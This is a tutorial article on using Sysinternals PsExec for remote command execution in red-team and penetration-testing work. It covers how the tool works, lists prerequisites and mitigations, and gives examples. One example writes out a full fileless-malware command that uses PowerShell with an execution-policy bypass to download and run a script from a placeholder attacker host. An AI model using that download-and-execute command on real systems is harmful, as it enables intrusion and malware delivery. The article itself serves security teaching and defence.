As a red teamer or a pen tester, one of your primary objectives is to identify and exploit vulnerabilities in your target systems. One way to do this is by using remote code execution (RCE) techniques. Remote code execution is a vulnerability that allows an attacker to execute code on a target system remotely. Several tools and methods are available to achieve RCE, and one of the most commonly used is PsExec. In this article, we will explore what PsExec is, how it works, and how it can be used by a red teamer or a pen tester to achieve RCE on a target system.

What is PsExec?

PsExec is a powerful command-line tool developed by Sysinternals (now owned by Microsoft) that allows system administrators to execute processes remotely on one or more machines in a network. PsExec can run commands, start services, or launch applications on remote systems. It uses a combination of Windows APIs and remote procedure calls (RPCs) to connect with a remote machine and then execute a command or a process on that machine.

How PsExec Works

To understand how PsExec works, let’s look at the different steps involved in using PsExec to execute a command remotely:

Step 1: Establishing a Connection

The first step in using PsExec is establishing a connection with the target system. To do this, PsExec uses the Windows Service Control Manager (SCM) to start a service called PsExecSvc on the target system. PsExecSvc is a small service that runs as the Local System account and listens for incoming connections from PsExec.

Step 2: Authenticating

Once the connection is established, PsExec sends authentication credentials to the target system to authenticate the user trying to access the system. The credentials can be provided in several ways, including using the -u and -p command-line switches, which allow you to specify a username and password.

Step 3: Executing the Command

After the user is authenticated, PsExec executes the command on the remote system. The command can be any valid command or executable file that can be executed on the target system. PsExec captures the command output and displays it on the local system.

Examples of PsExec Usage

Now that we understand how PsExec works let’s examine some examples of how it can be used in a red team or pen-testing scenario.

Example 1: Retrieving System Information

One of the simplest things you can do with PsExec is to retrieve system information from a remote system. For example, to retrieve the system information of a machine with the IP address 192.168.1.100, you can run the following command:

psexec \\192.168.1.100 systeminfo

This command will connect to the remote system, execute the systeminfo command, and display the results on your local system.

Example 2: Running Commands on Multiple Systems

PsExec also allows you to run commands on multiple systems simultaneously. For example, to execute the ipconfig command on three remote systems with IP addresses 192.168.1.100, 192.168.1.101, and 192.168.1.102, you can run the following command:

psexec \\192.168.1.100,192.168.1.101,192.168.1.102 ipconfig

This command will execute the ipconfig` command on all three remote systems and display the results on your local system.

Example 3: Launching Applications

PsExec can also be used to launch applications on remote systems. For example, to launch the notepad.exe application on a remote system with IP address 192.168.1.100, you can run the following command:

psexec \\192.168.1.100 notepad.exe

This command will launch the Notepad application on the remote system and display it on your local system.

Example 4: Starting Services

PsExec can also be used to start services on remote systems. For example, to start the Windows Remote Management (WinRM) service on a remote system with IP address 192.168.1.100, you can run the following command:

psexec \\192.168.1.100 net start winrm

This command will start the WinRM service on the remote system.

Example 5: Malicious Use Case

While PsExec can be a useful tool for system administrators, attackers can also use it maliciously to achieve RCE on a target system. For example, an attacker could use PsExec to execute a malware payload on a remote system by running the following command:

psexec \\192.168.1.100 cmd.exe /c "powershell.exe -ExecutionPolicy Bypass -Command \"iex (New-Object Net.WebClient).DownloadString('http://attacker.com/malware.ps1')\""

This command will connect to the remote system, execute the cmd.exe command, and then execute a PowerShell script that downloads and executes a malware payload from a remote server controlled by the attacker. This technique is known as a “fileless” malware attack, as it does not involve writing any files to the target system’s disk.

Prerequisites

Before using PsExec to execute commands remotely on a target system, several prerequisites must be met:

  1. Network Connectivity: PsExec requires network connectivity between the local and target systems. Ensure that the target system is reachable from the local system and that no network firewalls or restrictions could prevent the connection.
  2. Administrative Access: PsExec requires administrative access to the target system. Ensure that you have administrative privileges on the target system or access to an account with administrative privileges.
  3. Windows Firewall: PsExec uses the Windows Service Control Manager (SCM) and remote procedure calls (RPCs) to establish a connection with the target system. Ensure the Windows Firewall is not blocking these ports (TCP/445 and TCP/135).
  4. PsExec Executable: PsExec is a standalone executable that can be downloaded from the Microsoft Sysinternals website. Ensure you have the latest version of PsExec and that it is accessible from the command prompt or directory where you are executing the command.
  5. Authentication Credentials: PsExec requires authentication credentials to connect to the target system. Make sure that you have a valid username and password or that you are using an account with administrative privileges.

If you ensure that these prerequisites are met, you can use PsExec to execute commands remotely on a target system and test the security of your environment.

Mitigating PsExec-Based Attacks

To mitigate PsExec-based attacks, there are several steps that system administrators can take, including:

  1. Turn off the PsExec service (PsExecSvc) on all machines that do not require its use.
  2. Restrict the use of PsExec to authorized users and limit the systems it can use.
  3. Monitor network traffic for signs of PsExec-based attacks, such as unusual connections to PsExec ports (TCP/445 and TCP/135).
  4. Deploy endpoint protection solutions that can detect and block known PsExec-based attack techniques.

Conclusion

PsExec is a powerful tool that system administrators can use to remotely execute commands on multiple systems simultaneously. However, attackers can also use it maliciously to achieve RCE on a target system. Red teamers and pen testers can use PsExec to test the security of their target systems and identify vulnerabilities that attackers could exploit. By understanding how PsExec works and how it can be used, security professionals can better defend against PsExec-based attacks and protect their systems from compromise.